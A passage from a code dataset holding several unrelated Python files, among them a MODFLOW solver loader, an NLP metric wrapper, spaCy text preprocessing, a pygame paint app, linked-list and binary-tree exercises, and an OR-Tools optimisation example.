f.close()\n\n # determine specified unit number\n unitnumber = None\n filenames = [None, None]\n if ext_unit_dict is not None:\n unitnumber, filenames[0] = model.get_ext_dict_attr(\n ext_unit_dict, filetype=ModflowGmg._ftype()\n )\n if iunitmhc > 0:\n iu, filenames[1] = model.get_ext_dict_attr(\n ext_unit_dict, unit=iunitmhc\n )\n model.add_pop_key_list(iunitmhc)\n\n return cls(\n model,\n mxiter=mxiter,\n iiter=iiter,\n iadamp=iadamp,\n hclose=hclose,\n rclose=rclose,\n relax=relax,\n ioutgmg=ioutgmg,\n iunitmhc=iunitmhc,\n ism=ism,\n isc=isc,\n damp=damp,\n dup=dup,\n dlow=dlow,\n chglimit=chglimit,\n unitnumber=unitnumber,\n )\n\n @staticmethod\n def _ftype():\n return \"GMG\"\n\n @staticmethod\n def _defaultunit():\n return 27\n","repo_name":"modflowpy/flopy","sub_path":"flopy/modflow/mfgmg.py","file_name":"mfgmg.py","file_ext":"py","file_size_in_byte":14728,"program_lang":"python","lang":"en","doc_type":"code","stars":449,"dataset":"github-code","pt":"27"} +{"seq_id":"26849958645","text":"from __future__ import annotations\n\nimport copy\nfrom dataclasses import dataclass\nfrom typing import Any, cast, final, Optional\n\nfrom eaas.async_client import AsyncClient, AsyncRequest\nfrom eaas.config import Config\nimport numpy as np\nimport sacrebleu\n\nfrom explainaboard.metrics.metric import Metric, MetricConfig, MetricStats\nfrom explainaboard.metrics.registry import 
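# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original flopy module above: a minimal
# write/load round trip for ModflowGmg, assuming flopy is installed and the
# current directory is writable (model name "gmgdemo" is arbitrary).
#
#   import flopy
#   m = flopy.modflow.Modflow(modelname="gmgdemo")
#   gmg = flopy.modflow.ModflowGmg(m, mxiter=100, hclose=1e-6, rclose=1e-6)
#   gmg.write_file()
#   reloaded = flopy.modflow.ModflowGmg.load("gmgdemo.gmg",
#                                            flopy.modflow.Modflow())
#   assert reloaded.mxiter == 100
# ---------------------------------------------------------------------------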
metric_config_registry\n\n_eaas_config = None\n_eaas_client = None\n\n\ndef get_eaas_client():\n global _eaas_config, _eaas_client\n if not _eaas_client:\n _eaas_config = Config()\n _eaas_client = AsyncClient(_eaas_config)\n return _eaas_client\n\n\n@final\nclass EaaSMetricStats(MetricStats):\n \"\"\"MetricStats with EaaS invocations.\n\n Obtaining the data from EaaS is deferred until it is wanted.\n \"\"\"\n\n def __init__(self, name: str, pos: int, eaas_request: AsyncRequest) -> None:\n \"\"\"Initializes the EaaSMetricStats.\n\n Args:\n name: Name of this metric.\n pos: Position of the statistics in the returned array.\n eaas_request: Request object to the EaaS service.\n \"\"\"\n self._name = name # TODO(odashi): Remove this member.\n self._pos = pos\n self._eaas_request = eaas_request\n self._data: np.ndarray | None = None\n\n def _fetch_results(self) -> None:\n \"\"\"Obtains the data from the EaaS service.\"\"\"\n if self._data is None:\n result = self._eaas_request.get_result()\n self._data = np.array(\n [\n x if isinstance(x, list) else [x]\n for x in result['scores'][self._pos]['stats']\n ]\n )\n\n def __len__(self) -> int:\n \"\"\"See MetricStats.__len__.\"\"\"\n return len(self.get_data())\n\n def is_batched(self) -> bool:\n \"\"\"See MetricStats.is_batched.\"\"\"\n return False\n\n def num_statistics(self) -> int:\n \"\"\"See MetricStats.num_statistics.\"\"\"\n return self.get_data().shape[-1]\n\n def get_data(self) -> np.ndarray[tuple[int, int], Any]:\n \"\"\"See MetricStats.get_data.\"\"\"\n self._fetch_results()\n # self._data must have the data at this point.\n return cast(np.ndarray, self._data)\n\n def get_batch_data(self) -> np.ndarray[tuple[int, int, int], Any]:\n \"\"\"See MetricStats.get_batch_data.\"\"\"\n raise NotImplementedError\n\n\n@dataclass\n@metric_config_registry.register(\"EaaSMetricConfig\")\nclass EaaSMetricConfig(MetricConfig):\n def to_metric(self):\n return EaaSMetric(self)\n\n\nclass EaaSMetric(Metric):\n \"\"\"\n A metric that calculates evaluation scores using EaaS.\n \"\"\"\n\n _NOT_SIMPLE_METRICS = {'bleu', 'chrf', 'length_ratio', 'length'}\n\n def calc_metric_from_aggregate(\n self, agg_stats: np.ndarray, config: Optional[MetricConfig] = None\n ) -> np.ndarray:\n if agg_stats.ndim == 1:\n agg_stats = agg_stats.reshape((1, agg_stats.shape[0]))\n n_samples = agg_stats.shape[0]\n if self.config.name in {'bleu', 'chrf'}:\n ret_metric = np.zeros(n_samples)\n metric_class = (\n sacrebleu.BLEU() if self.config.name == 'bleu' else sacrebleu.CHRF()\n )\n for i, single_stat in enumerate(agg_stats):\n ret_metric[i] = (\n metric_class._compute_score_from_stats(list(single_stat)).score\n / 100.0\n )\n return ret_metric\n elif self.config.name == 'length_ratio':\n return agg_stats[:, 0] / agg_stats[:, 1]\n elif self.config.name == 'length':\n return agg_stats[:, 0]\n else:\n return agg_stats\n\n def is_simple_average(self, stats: MetricStats):\n return self.config.name not in self._NOT_SIMPLE_METRICS\n\n def aggregate_stats(self, stats: MetricStats) -> np.ndarray:\n \"\"\"\n Aggregate sufficient statistics from multiple examples into a single example\n :param stats: stats for every example\n :return: aggregated stats\n \"\"\"\n data = stats.get_batch_data() if stats.is_batched() else stats.get_data()\n if self.config.name in {'bleu', 'chrf'}:\n return np.sum(data, axis=-2)\n else:\n return np.mean(data, axis=-2)\n\n def calc_stats_from_data(\n self, true_data: list, pred_data: list, config: Optional[MetricConfig] = None\n ) -> MetricStats:\n # Note that it's 
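# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original eaas.py above: its aggregate
# path rebuilds corpus BLEU/chrF from summed sufficient statistics and
# divides by 100. The same 0-1 scores computed directly from text with
# sacrebleu:
#
#   import sacrebleu
#   hyps = ["the cat sat on the mat"]
#   refs = [["the cat is on the mat"]]   # one reference stream
#   print(sacrebleu.corpus_bleu(hyps, refs).score / 100.0)
#   print(sacrebleu.corpus_chrf(hyps, refs).score / 100.0)
# ---------------------------------------------------------------------------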
better to batch requests when possible, e.g. as in\n # `processors/conditional_generation.py`\n inputs = []\n for td, pd in zip(true_data, pred_data):\n ntd = copy.deepcopy(td)\n ntd['hypothesis'] = pd\n inputs.append(ntd)\n async_request = get_eaas_client().async_score(\n inputs,\n metrics=[self.config.name],\n calculate=['corpus', 'stats'],\n )\n return EaaSMetricStats(name=self.config.name, pos=0, eaas_request=async_request)\n","repo_name":"pfliu-nlp/ExplainaBoard-Debug","sub_path":"explainaboard/metrics/eaas.py","file_name":"eaas.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"6353966331","text":"from pathlib import Path\n\nimport fire\nfrom tqdm import tqdm\n\nfrom modules.dataset import _get_MSD_raw_dataset \nfrom modules.utils import save_json\n\n\ndef main(local=True, \n overwrite = False, \n out_dir = 'data_tfrecord'):\n \"\"\"\n Process the tfrecords MSD dataset to extract the track ids.\n Save list as json to out_path. \n \"\"\"\n \n if not overwrite: \n print(\"Use --overwrite True to overwrite existing output file.\")\n return\n \n else: \n dataset = _get_MSD_raw_dataset(local=local)\n track_ids = {}\n\n for data_example in tqdm(dataset):\n track_id = data_example['tid'].numpy()[0].decode('UTF-8')\n \n try:\n track_ids[track_id] += 1\n except KeyError:\n track_ids[track_id] = 1\n\n # Save list of track IDs\n list_of_track_ids = list(track_ids.keys())\n out_path = Path(out_dir) / \"waveforms_track_ids.json\"\n save_json(list_of_track_ids, out_path)\n\n return\n\n\nif __name__==\"__main__\":\n fire.Fire(main)\n","repo_name":"Gaspard-a11y/ArcSong","sub_path":"process_tfrecords.py","file_name":"process_tfrecords.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"574382868","text":"import collections\nimport re\nimport xml.etree.ElementTree as ET\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport spacy\n\n# nlp = en_core_web_sm.load(disable=['parser', 'ner'])\nnlp = spacy.load(\"en_core_web_sm\", disable=[\"parser\", \"ner\"])\n\npd.set_option('max_colwidth', 150)\n\ndata_dir = \"../output/oj/\"\nfile_name = \"reg_2016_679_akn.xml\"\n\n\ndef to_string_utf8(document):\n return document.decode('utf-8')\n\n\ndef get_doc_data(filepath):\n tree = ET.parse(filepath)\n document = ET.tostring(tree.getroot(), encoding='utf-8', method='text')\n document = to_string_utf8(document)\n document = re.sub('[ \\t\\n]+', ' ', document)\n return document\n\n\ndocContent = get_doc_data(data_dir + file_name)\nprint(\"docContent: \", docContent[0: 250], \"...\")\ndf = pd.DataFrame(data={'documentName': [], 'documentContent': []}, dtype=np.str_)\ndf.loc[1, 'documentName'] = 'filename1'\ndf.loc[1, 'documentContent'] = docContent\n\ndoc = nlp(docContent)\n\nwords_as_pos = []\nfor word in doc:\n if word.is_stop == False and len(word.text) > 2 and word.is_alpha: # letters at least 3 characters\n words_as_pos.append(word.pos_) # POS is more about the context of the features than frequencies of features\n\ndf['doc'] = df['documentContent'].apply(lambda x: nlp(x))\ndf['list_of_POSs'] = df['doc'].apply(lambda x: [word.pos_\n for word in x if (word.is_stop==False) & \\\n (len(word.text)>2) & \\\n (word.is_alpha)\n ])\n\n# count total frequencies of words\nPOS_freq_counter = collections.Counter(words_as_pos)\ns_POS_freq = pd.Series(POS_freq_counter, dtype=float)\ns_POS_freq = 
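# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original script above: the
# POS-counting idiom it uses, reduced to a standalone snippet (requires the
# en_core_web_sm model to be installed).
#
#   import collections, spacy
#   nlp = spacy.load("en_core_web_sm", disable=["parser", "ner"])
#   doc = nlp("Regulators publish the final data protection text.")
#   counts = collections.Counter(
#       t.pos_ for t in doc if t.is_alpha and not t.is_stop and len(t.text) > 2)
#   print(counts.most_common())
# ---------------------------------------------------------------------------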
s_POS_freq.sort_values(ascending=False)\ndf_tmp = pd.DataFrame(s_POS_freq, columns=['Frequency'], dtype=float)\n# print(\"df_tmp: \\n\", df_tmp)\n\ndf_tmp.plot.bar(alpha=0.5, color='c', legend=False, title='POS frequency in all texts combined')\nplt.show()\n\nselected_POSs = ['NOUN', 'VERB', 'ADJ', 'ADV']\nprint('selecting POSs:', selected_POSs)\n\n# words_as_lemma = []\n# for word in doc:\n# if word.is_stop == False and len(word.text) > 2 and word.is_alpha and word.pos_ in selected_POSs:\n# words_as_lemma.append(word.lemma_)\n# final = \" \".join(words_as_lemma)\n# print(\"words_as_lemma: \", final[0: 150], \"...\")\n# df_data = pd.DataFrame.from_records(words_as_lemma, columns=['words_as_lemma'])\n\n\ndf['list_of_lemmas'] = df['doc'].apply(lambda x: [word.lemma_\n for word in x if (word.is_stop==False) & \\\n (len(word.text)>2) & \\\n (word.is_alpha) & \\\n (word.pos_ in selected_POSs)])\n\ntmp_list = df['list_of_lemmas'].apply(set).apply(list).tolist()\nlist_of_lemmas = [lemma for sublist in tmp_list for lemma in sublist]\n\nlemma_freq_counter = collections.Counter(list_of_lemmas)\ns_lemma_freq = pd.Series(lemma_freq_counter)\nprint('Total number of unique lemmas: ', len(s_lemma_freq))\n\nprint(\"\\nDistribution of lemmas' document counts: \", s_lemma_freq.describe(percentiles=[0.55, 0.65, 0.75, 0.85, 0.95, 0.97, 0.99]))\n\n# look through to 20 most/least frequent lemmas\ns_tmp = s_lemma_freq.sort_values(ascending=False)\ndf_tmp = pd.DataFrame({'Most freq words': list(s_tmp.index[:20]),\n 'M_freq': list(s_tmp.iloc[:20]),\n 'Least freq words': list(s_tmp.index[-20:]),\n 'L_freq': list(s_tmp.iloc[-20:])})\n\nprint (\"df_tmp: \\n\", df_tmp)\n\n# To reduce dimentionality of dictionary for topic modeling lemmas that have frequency count lower than 50th percentile and higer 99.9\n# percentile were deleted select upper and lower boundary for lemmas' count\nup_pct = s_lemma_freq.quantile(0.99)\nlow_pct = s_lemma_freq.quantile(0.50)\n\nprint('Lemma count upper bound:', up_pct)\nprint('Lemma count lower bound:', low_pct)\n\n# select lemmas\nselected_lemmas = set(s_lemma_freq[(s_lemma_freq >= low_pct)&(s_lemma_freq <= up_pct)].index)\nprint('List of lemmas for topic modeling dictionary is reduced from', len(s_lemma_freq), 'to', len(selected_lemmas))\nprint(\"\\nExample of selected lemmas:\", list(selected_lemmas)[:5])\n\n# select lemmas in each document if they belong to chosen list of lemmas\ndf['selected_list_of_lemmas'] = df['list_of_lemmas'].apply(lambda x: [l for l in x if l in selected_lemmas])","repo_name":"ermalaliraj/bigdata_and_ai","sub_path":"ai/eur-lex-integration/python_tatiana/preprocessing_lemma.py","file_name":"preprocessing_lemma.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"70218652873","text":"def benchmark(func):\n \"wrapper for function benchmarking\"\n from time import time\n def wrapper(*args, **kwargs):\n start = time()\n result = func(*args, **kwargs)\n difference = (time() - start) * 1000 # milliseconds\n message = 'Benchmark: #' + func.__name__\n message += ': ' + (\"%0.2f\" % difference)\n return result\n return wrapper\n","repo_name":"allaud/lambda_store","sub_path":"src/python/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"974950867","text":"import pygame, sys\r\nimport numpy as np\r\npygame.init()\r\nsc = 
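# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original script above: its
# quantile-based vocabulary pruning, reduced to a standalone snippet.
#
#   import pandas as pd
#   s = pd.Series({"data": 90, "process": 60, "regulation": 40, "rare": 1})
#   low, up = s.quantile(0.50), s.quantile(0.99)
#   kept = set(s[(s >= low) & (s <= up)].index)  # drops too-rare/too-common
# ---------------------------------------------------------------------------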
pygame.display.set_mode((1280, 720))\r\ndraw = False\r\nsize = 4\r\nrects = {(size, (0, 0, 0)): set()}\r\neraser = False\r\nfont = pygame.font.SysFont(None, 40)\r\nclock = pygame.time.Clock()\r\nr_s = 5\r\nc = (0, 0, 0)\r\nx = 17\r\nn_1 = np.array(range(-size, size))\r\n\r\ndef colors():\r\n global c, size, x\r\n mouse_pos = pygame.mouse.get_pos()\r\n m_x = mouse_pos[0]\r\n m_y = mouse_pos[1]\r\n click = pygame.mouse.get_pressed()\r\n for i in range(0, 255):\r\n pygame.draw.rect(sc, (i, 0, 0), (22 + i, 515, 1, 40))\r\n pygame.draw.rect(sc, (0, i, 0), (22 + i, 555, 1, 40))\r\n pygame.draw.rect(sc, (0, 0, i), (22 + i, 595, 1, 40))\r\n pygame.draw.rect(sc, (i, i, i), (22 + i, 635, 1, 40))\r\n if m_y > 515 and m_y < 555:\r\n if m_x > 22 and m_x < 277:\r\n if click[0] == 1:\r\n c = (m_x - 22, 0, 0)\r\n elif m_y > 555 and m_y < 595:\r\n if m_x > 22 and m_x < 277:\r\n if click[0] == 1:\r\n c = (0, m_x - 22, 0)\r\n elif m_y > 595 and m_y < 635:\r\n if m_x > 22 and m_x < 277:\r\n if click[0] == 1:\r\n c = (0, 0, m_x - 22)\r\n elif m_y > 635 and m_y < 675:\r\n if m_x > 22 and m_x < 277:\r\n if click[0] == 1:\r\n c = (m_x - 22, m_x - 22, m_x - 22)\r\n pygame.draw.line(sc, (0, 0, 0), (22, 450), (272, 450), 3)\r\n pygame.draw.rect(sc, (75, 75, 75), (x, 430, 10, 40))\r\n if m_y > 430 and m_y < 470:\r\n if m_x > 17 and m_x < 272:\r\n if click[0] == 1:\r\n size = (m_x - 17)//25\r\n x = 17 + size * 25\r\n\r\ndef buttons(x, y, text, file, func1):\r\n global draw, eraser\r\n font = pygame.font.SysFont(None, 30)\r\n image = pygame.image.load(file).convert_alpha()\r\n sc.blit(image, (x,y))\r\n mouse_pos = pygame.mouse.get_pos()\r\n m_x = mouse_pos[0]\r\n m_y = mouse_pos[1]\r\n if m_x > x and m_x < (x+50) and m_y > y and m_y < (y+50):\r\n click = pygame.mouse.get_pressed()\r\n if click[0] == 1:\r\n if func1 == eraser:\r\n eraser, draw = True, False\r\n elif func1 == draw:\r\n eraser, draw = False, True\r\n pygame.draw.rect(sc, (255, 255, 255), (x, y, 50, 50))\r\n symb = font.render(text, True, (255, 255, 255), (75, 75, 75))\r\n sc.blit(symb, (m_x, m_y - 15))\r\n\r\ndef bin(x, y):\r\n global rects\r\n font = pygame.font.SysFont(None, 30)\r\n image = pygame.image.load('bin.png').convert_alpha()\r\n sc.blit(image, (x, y))\r\n mouse_pos = pygame.mouse.get_pos()\r\n m_x = mouse_pos[0]\r\n m_y = mouse_pos[1]\r\n click = pygame.mouse.get_pressed()\r\n if m_x > x and m_x < (x + 50) and m_y > y and m_y < (y + 50):\r\n if click[0] == 1:\r\n for key in rects.keys():\r\n rects[key] = set()\r\n pygame.draw.rect(sc, (255, 255, 255), (x, y, 50, 50))\r\n symb = font.render('Очистить (R)', True, (255, 255, 255), (75, 75, 75))\r\n sc.blit(symb, (m_x, m_y - 15))\r\n\r\ndef detect():\r\n global rects, types, types_list, sets, tup\r\n mouse_pos = pygame.mouse.get_pos()\r\n m_x = mouse_pos[0]\r\n m_y = mouse_pos[1]\r\n koef = size * r_s\r\n if m_x > 300 and m_x < 1235 and m_y > 45 and m_y < 675:\r\n r_x = m_x // r_s * r_s\r\n r_y = m_y // r_s * r_s\r\n if draw and eraser is not True:\r\n if rects.get((size, c)) is not None:\r\n for i in n_1:\r\n for i1 in n_1:\r\n rects[(size, c)].add((r_x + i * r_s, r_y + i1 * r_s))\r\n else: rects[(size, c)] = {(-100, 0)}\r\n pygame.draw.rect(sc, (0, 0, 0), (r_x - koef, r_y - koef, koef * 2, koef * 2), 1)\r\n\r\ndef drawing():\r\n n_a = np.array(list(rects.keys()))\r\n for key in n_a:\r\n n = np.asarray(list(rects[tuple(key)]))\r\n for coords in n:\r\n pygame.draw.rect(sc, key[1], (coords[0], coords[1], r_s, r_s))\r\n\r\n\r\ndef eras():\r\n global rects\r\n click = pygame.mouse.get_pressed()\r\n 
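    # -----------------------------------------------------------------------
    # Note (added for clarity): the eraser below relies on the same grid
    # snapping used in detect(): integer-dividing a pixel coordinate by the
    # cell size r_s and multiplying back rounds it down to the cell origin,
    # e.g. with r_s = 5: 23 // 5 * 5 == 20.
    # -----------------------------------------------------------------------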
if click[0] == 1:\r\n        mouse_pos = pygame.mouse.get_pos()\r\n        m_x = mouse_pos[0]\r\n        m_y = mouse_pos[1]\r\n        for key in rects.keys():\r\n            for i in n_1:\r\n                dx = (m_x // r_s) + i\r\n                for i1 in n_1:\r\n                    dy = (m_y//r_s)+i1\r\n                    if (dx*r_s, dy*r_s) in rects[key]:\r\n                        rects[key].remove((dx*r_s, dy*r_s))\r\n                    else: continue\r\n\r\n\r\ndef events():\r\n    global draw, eraser, rects, scale\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            sys.exit()\r\n        if eraser == False:\r\n            if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\r\n                draw = True\r\n            if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\r\n                draw = False\r\n        if event.type == pygame.KEYDOWN:\r\n            if event.key == pygame.K_e:\r\n                eraser = True\r\n            elif event.key == pygame.K_b:\r\n                eraser = False\r\n            elif event.key == pygame.K_r:\r\n                for key in rects.keys():\r\n                    rects[key] = set()\r\n\r\nwhile True:\r\n    sc.fill((255, 255, 255))\r\n    events()\r\n    drawing()\r\n    buttons(50, 45, 'Eraser (E)', 'eraser.png', eraser)\r\n    buttons(50, 145, 'Brush (B)', 'brush.jpg', draw)\r\n    bin(50, 245)\r\n    if eraser:\r\n        eras()\r\n    # sc.blit(symb, (640, 0))\r\n    pygame.draw.rect(sc, (0, 0, 0), (300, 45, 935, 630), 2)\r\n    colors()\r\n    detect()\r\n    clock.tick()\r\n    pygame.display.set_caption(f'{clock.get_fps()}')\r\n    pygame.display.flip()\r\n\r\n","repo_name":"2tieatie/paint_on_python","sub_path":"paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72045666632","text":"class LinkedIntList:\n\n\n    def __init__(self):\n        self.size = 0\n        self.first = None\n        self.last = None\n\n\n    def addLast(self,value):\n        if self.first == None:\n            self.last = IntNode(value, None)\n            self.first = self.last\n        else:\n            node = IntNode(value, None)\n            self.last.next = node\n            self.last = node\n        self.size += 1\n\n\n    def addFirst(self, value):\n        self.first = IntNode(value, self.first)\n        self.size += 1\n\n\n    def removeFirst(self):\n        if self.isEmpty():\n            raise ReferenceError(\"list is empty\")\n\n        self.first = self.first.next\n        self.size -= 1\n    \n\n    def removeLast(self):\n        if self.isEmpty():\n            raise ReferenceError(\"list is empty\")\n\n        currentnode = self.first\n\n        while currentnode.next != self.last:\n            currentnode = currentnode.next\n\n        currentnode.next = None\n        self.size -= 1\n\n\n    def clear(self):\n        self.size = 0\n        self.first = None\n        self.last = None\n\n\n    def isEmpty(self):\n        if self.last == None:\n            return True\n        else:\n            return False\n\n\n    def get(self, index):\n        if index >= self.size:\n            raise ValueError(\"indexOutOfBounds\")\n\n        currentnode = self.first\n        for i in range(index):\n            currentnode = currentnode.next\n        return currentnode.value\n\n\n    def set(self, index, value):\n        if index >= self.size:\n            raise ValueError(\"indexOutOfBounds\")\n\n        currentnode = self.first\n        for i in range(index):\n            currentnode = currentnode.next\n        currentnode.value = value\n\n\n    def printList(self):\n        string = \"[\"\n        currentnode = self.first\n        while True:\n            string += \" {}\".format(currentnode.value)\n            if currentnode.next == None:\n                break\n            else:\n                currentnode = currentnode.next\n\n        string += \" ]\"\n\n        return string\n\nclass IntNode:\n    def __init__(self, value, next):\n        self.value = value\n        self.next = next\n\n\nnewList = 
LinkedIntList()\n\nnewList.addLast(5)\nnewList.addLast(6)\nnewList.addFirst(2)\nnewList.addFirst(8)\nnewList.addLast(17)\n\nprint(newList.size)\nprint(newList.first.value)\nprint(newList.last.value)\nprint(newList.printList())\n","repo_name":"value03/linkedIntList","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42368563267","text":"import torch\nimport numpy as np\nfrom collections import deque\nfrom tensorboardX import SummaryWriter\nfrom unityagents import UnityEnvironment\nfrom agent import TennisAgent\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nRUN_NAME = \"Test2\"\n\n# Initializing the Unity Banana environment\nenv = UnityEnvironment(file_name=\"Tennis_Linux_NoVis/Tennis.x86_64\", worker_id=1)\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\n# Initializing the state_size and action_size for the environment\nt_env_info = env.reset(train_mode=True)[brain_name]\nt_state = t_env_info.vector_observations[0]\nnum_agents = len(t_env_info.vector_observations)\nstate_size = len(t_state)\naction_size = brain.vector_action_space_size\nprint('State shape: ', state_size)\nprint('Number of actions: ', action_size)\nprint('Number of agents: ', num_agents)\n\n# Creating the TennisAgent object\nagent = TennisAgent(state_size, action_size, num_agents)\n\n\ndef maddpq():\n \"\"\"This method collects values from the environment and passes those to the agent for training.\n This method also saves training data in \"log/tensorboard/\" and trained agents in \"checkpoints/\"\n \"\"\"\n\n scores = [] # list containing scores from each episode\n scores_window = deque(maxlen=100)\n writer = SummaryWriter(log_dir=\"log/tensorboard/\" + RUN_NAME) # initialize writer object for tensorboard\n\n i_episode = 0\n step = 0\n solved_episode = 0\n\n while True:\n env_info = env.reset(train_mode=True)[brain_name]\n state = env_info.vector_observations\n score = np.array([0.0 for i in range(num_agents)])\n\n while True:\n action = agent.act(state, add_noise=True, step=step)\n\n env_info = env.step(action)[brain_name]\n next_state = env_info.vector_observations\n reward = env_info.rewards\n done = env_info.local_done\n done_numpy = np.array(done).astype(np.float32)\n\n agent.step(state, action, reward, next_state, done_numpy)\n\n state = next_state\n score += np.array(reward)\n step += 1\n\n if np.any(done):\n break\n\n score = np.max(score)\n\n if len(scores_window) > 0:\n writer.add_scalar(\"score_mean_100\", np.mean(scores_window), i_episode)\n writer.add_scalar(\"score\", score, i_episode)\n writer.flush()\n\n scores_window.append(score)\n scores.append(score)\n print('\\rEpisode {}\\tAverage Score: {:.3f}'.format(i_episode, np.mean(scores_window)), end=\"\")\n\n if i_episode > 0 and i_episode % 500 == 0:\n print()\n\n # Tf the mean score is 1.0, the training is finished\n if np.mean(scores_window) >= 1.0:\n if solved_episode == 0:\n solved_episode = i_episode\n\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.3f}'\n .format(i_episode, np.mean(scores_window)))\n\n print('\\nReached 0.5 mean on episode {:d}'.format(solved_episode))\n\n torch.save(agent.common_critic.state_dict(), 'checkpoints/' + RUN_NAME + 'critic.pth')\n for i in range(num_agents):\n torch.save(agent.actor[i].state_dict(), 'checkpoints/' + RUN_NAME + 'actor' + str(i + 1) + '.pth')\n\n break\n\n if np.mean(scores_window) >= 0.5 and 
solved_episode == 0:\n            solved_episode = i_episode\n\n        i_episode += 1\n\n    writer.close()\n    env.close()\n\n\nmaddpq()\n","repo_name":"fahimfss/ProjectTennis","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"35060497698","text":"# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\nclass Solution:\n    def sortedListToBST(self, head):\n        if not head:\n            return None\n        arr = []\n        node = head\n        while node:\n            arr.append(node.val)\n            node = node.next\n\n        def build_tree(arr, s, e):\n            if s > e:\n                return None\n            # find middle\n            m = (s + e) // 2\n            new_node = TreeNode(arr[m])\n            if s == e:\n                return new_node\n            new_node.left = build_tree(arr,s, m - 1)\n            new_node.right = build_tree(arr,m + 1, e)\n            return new_node\n        return build_tree(arr, 0, len(arr) - 1)\n\ndef array_to_list(arr):\n    head = node = ListNode(arr[0])\n    for i in range(1, len(arr)):\n        node.next = ListNode(arr[i])\n        node = node.next\n    return head\n\n\nsol = Solution()\n\nprint(sol.sortedListToBST(array_to_list([-10,-3,0,5,9])))\n\n","repo_name":"joestalker1/leetcode","sub_path":"src/main/scala/ConvertSortedListToBinarySearchTree.py","file_name":"ConvertSortedListToBinarySearchTree.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19188410751","text":"'''\nhttps://www.estadistica.net/Algoritmos2/pau-programacion.pdf\n\n\n'''\nfrom ortools.sat.python import cp_model\n\n# Initialize the model and the solver\nmodelo = cp_model.CpModel()\nsolucionador = cp_model.CpSolver()\n# Variables\n'''IN THIS PROBLEM WE WORK IN TONNES'''\npiensoA = modelo.NewIntVar(0, 6, \"piensoA\")\npiensoB = modelo.NewIntVar(0, 4, \"piensoB\")\n\n# Constraints\nmodelo.Add(piensoB <= 2*piensoA)\nmodelo.Add(2*piensoA + piensoB >= 4)\n\n# Expression to optimize\nmodelo.Minimize(1000*piensoA + 2000*piensoB)\n\n# Run the solver\nestado = solucionador.Solve(modelo)\n\n# Solution\nif estado == cp_model.OPTIMAL:\n    print(\"**********************Solution**********************\")\nprint()\nprint(\"The optimal value is:\")\nprint(f'feed A = {solucionador.Value(piensoA)}')\nprint(f'feed B = {solucionador.Value(piensoB)}')","repo_name":"AnaLopezP/Prog_con_restricciones","sub_path":"ejercicio.py","file_name":"ejercicio.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25543780548","text":"import unittest\nfrom db.database import ShelveRepository\nfrom db.sequence import IncrementalSequence\nimport os\nfrom db.exceptions import PersistentObjectDoesNotExists\n\n\nclass Player:\n\n    def __init__(self, name, surname, pk=None):\n        self.name = name\n        self.surname = surname\n        if pk is not None:\n            self.pk = pk\n\n\nclass ShelvePersistenceTest(unittest.TestCase):\n\n    repository = None\n    sequence = None\n\n    @classmethod\n    def setUpClass(cls) -> None:\n        cls.repository = ShelveRepository(\"players_test\", IncrementalSequence)\n        cls.sequence = cls.repository.sequence_strategy\n\n    @classmethod\n    def tearDownClass(cls) -> None:\n        del cls.repository\n        cls.remove_test_db_files()\n\n    @staticmethod\n    def remove_test_db_files():\n        my_dir = os.path.join(os.path.dirname(__file__), 
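# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original ejercicio.py above: with
# CP-SAT the minimised objective can be read back via solver.ObjectiveValue()
# once the status is OPTIMAL or FEASIBLE, e.g.
#
#   from ortools.sat.python import cp_model
#   model, solver = cp_model.CpModel(), cp_model.CpSolver()
#   x = model.NewIntVar(0, 6, "x"); y = model.NewIntVar(0, 4, "y")
#   model.Add(y <= 2 * x); model.Add(2 * x + y >= 4)
#   model.Minimize(1000 * x + 2000 * y)
#   if solver.Solve(model) in (cp_model.OPTIMAL, cp_model.FEASIBLE):
#       print(solver.ObjectiveValue(), solver.Value(x), solver.Value(y))
# ---------------------------------------------------------------------------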
